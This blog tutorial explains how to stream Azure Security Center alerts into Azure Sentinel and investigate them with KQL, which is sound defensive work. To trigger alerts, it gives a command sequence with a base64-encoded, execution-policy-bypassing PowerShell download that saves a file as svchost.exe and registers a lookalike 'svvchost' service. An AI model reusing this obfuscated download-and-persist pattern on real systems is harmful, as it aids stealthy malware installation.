Azure Security Center is a security management tool that allows you to gain insight into your security state across hybrid cloud workloads, reduce your exposure to attacks, and respond to detected threats quickly. Azure Security Center (ASC) has two mains value proposition:
- Cloud Security Posture Management (CSPM) – Help you prevent misconfiguration to strengthen your security posture for all different types of cloud workloads and resources in Azure (IaaS, PaaS, and SaaS).
- Cloud Workload Protection Platform (CWPP) – Protect against threats for servers whether they are running in Azure, on-premises or in different clouds such as Amazon AWS or Google GCP, in additional to cloud-native workloads such as Web Apps, Kubernetes, Key Vaults, as well as for SQL databases (PaaS/VM) and storage accounts.
Microsoft Azure Sentinel is a cloud-native Security Information Event Management (SIEM) and Security Orchestration Automated Response (SOAR) solution. Azure Sentinel delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for alert detection, threat visibility, proactive hunting, and threat response.
If you have Azure Security Center enabled in your subscription, then you can start ingesting the Security Alerts generated by the Security Center to Azure Sentinel, which provides a rich set of threat detections. Security Center will generate alerts according to different resource types:
- Alerts for IaaS Windows and Linux machines, as well as for non-Azure machines running on-premises or in other clouds.
- Alerts for Azure App Service.
- Alerts for Azure containers.
- Alerts for SQL Database and SQL Data Warehouse.
- Alerts for Azure Storage.
- Alerts for Cosmos DB.
- And much more…
In this article, I will show you how to connect Azure Security Center to Azure Sentinel to stream security alerts, and how to use Kusto Query Language (KQL) to investigate an alert.
To follow this article, you need to have the following:
- Microsoft Azure subscription. If you don’t have an Azure subscription, you can create a free one here.
- Log Analytics Workspace – To create a new workspace, follow the instructions in Create a Log Analytics workspace.
- Azure Security Center – Standard Tier enabled.
- Virtual Machine running on Azure or on-premises with the Microsoft Monitoring Agent (MMA) agent installed and in a healthy state.
- Azure Sentinel enabled and connected to the Log Analytics workspace.
Connect Azure Security Center
Assuming you have all the prerequisites in place, follow the instructions below to stream your security alerts from Azure Security Center into Azure Sentinel:
- Open Azure Portal and sign in with a user who has (contributor) privileges for the workspace on which Azure Sentinel is enabled as well as the resource group.
- Under the All services option, type Sentinel, and click Azure Sentinel, as shown in the screenshot below.
- On the Azure Sentinel workspaces blade, click in the workspace that you created earlier.
- When the Azure Sentinel – Overview dashboard opens, click Data Connectors under Configuration in the left navigation pane.
- In the Search by name or provider field, start typing Azure Security Center, and then click on Azure Security Center. Then click on the Open connector page as shown in the screenshot below.
- The full Azure Security Center connector page appears, under the Configuration section, next to the subscription name that has the Azure Security Center standard tier enabled, click Connect as shown in the screenshot below. You can connect more than one subscription if you want. Please note that all subscriptions which have Azure Security Center standard tier enabled will show under the Subscription list.
- The Connection Status will temporarily appear as Connecting…, and once it is finished, it will appear as Connected as shown in the screenshot below.
- After confirming that it is connected, you can close the Azure Security Center page, and on the Data Connectors page, click Refresh; you will see that the Azure Security Center connector status appears as Connected as shown in the screenshot below.
At this point, all security alerts that are triggered in Azure Security Center will appear in Azure Sentinel.
Investigating alerts in Azure Sentinel
To simulate an alert in Security Center and investigate it in Azure Sentinel, I will run a series of commands within the virtual machine guest OS assuming that the attacker has already compromised the machine.
Logon to the VM, open a command prompt (cmd) with administrative privileges, and run the following set of commands:
mkdir c:\temp powershell -nop -exec bypass -EncodedCommand "cABvAHcAZQByAHMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJgAgAHsAIABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBkAG8AdwBuAGwAbwBhAGQALgBzAHkAcwBpAG4AdABlAHIAbgBhAGwAcwAuAGMAbwBtAC8AZgBpAGwAZQBzAC8AUwB5AHMAbQBvAG4ALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAGMAOgBcAHQAZQBtAHAAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIAB9ACIA" sc.exe create "svvchost" binpath= "c:\temp\svchost.exe" sc.exe start svvchost
The intent of this command is to simulate the download of a file from an external location and save it in the local folder with a different name. The -EncodedCommand parameter is to encode a string into base64. The string is the path to download a file from an external site and save it locally under C:\temp and the file that will be downloaded is Sysmon (System Monitor) tool by Sysinternals.
By the time you finish running the commands above, you should have a sequence of alerts in Security Center | THREAT PROTECTION | Security alerts similar to the one below. This is where Azure Security Center behavioral analytics has its high value since it will detect known patterns to discover malicious behavior.
Switch back to Azure Sentinel – Overview dashboard opens, click Data Connectors under Configuration in the left navigation pane, and then click on Azure Security Center. You will see now data and log received as shown in the screenshot below.
Next, you need to access the workspace from Azure Sentinel and perform some queries using Kusto Query Language (KQL).
Within the same Azure Sentinel – Overview dashboard, under General click Logs.
On the Logs page under New Query 1*, type SecurityAlert and then click the Run button. You should see all security alerts that were performed and collected in the last 24 hours (which is the default time frame). The result should look similar to the image below.
To narrow the search to look only for activities that are related to VM creation, type the query below and click Run. This query will list all alerts generated by Azure Security Center where the alert name contains the keyword “suspicious”.
SecurityAlert | where AlertName contains "suspicious"
If you click and open any of the results and then expand the ExtendedProperties, you will see the full details where you can investigate further and understand the behavior of this suspicious command line. The results should be similar to the screenshot below:
If you want to get started with Kusto Query Language (KQL), I highly recommend bookmarking the new official page for KQL quick reference guide.
If you want additional guided examples on how to simulate and investigate alerts in Azure Security Center and Azure Sentinel, I highly recommend to check the following Threat Hunting Playbooks published by Microsoft.
As you have seen in this article, by connecting Azure Security Center to Azure Sentinel will give you more insight into your organization’s network and system by view dashboards, you can create custom alerts, run automated playbooks and further investigate any suspicious activity. To learn more about Azure Security Center, check the official documentation from Microsoft.
The power of Azure Sentinel comes from the ability to detect, investigate, and remediate threats. To do this, you must first ingest data in the form of alerts from different security providers, such as Azure Security Center or other Microsoft solutions, as well as other third-party solutions. To learn more about Azure Sentinel, check the official documentation from Microsoft.
Thank you for reading my blog.
If you have any questions or feedback, please leave a comment.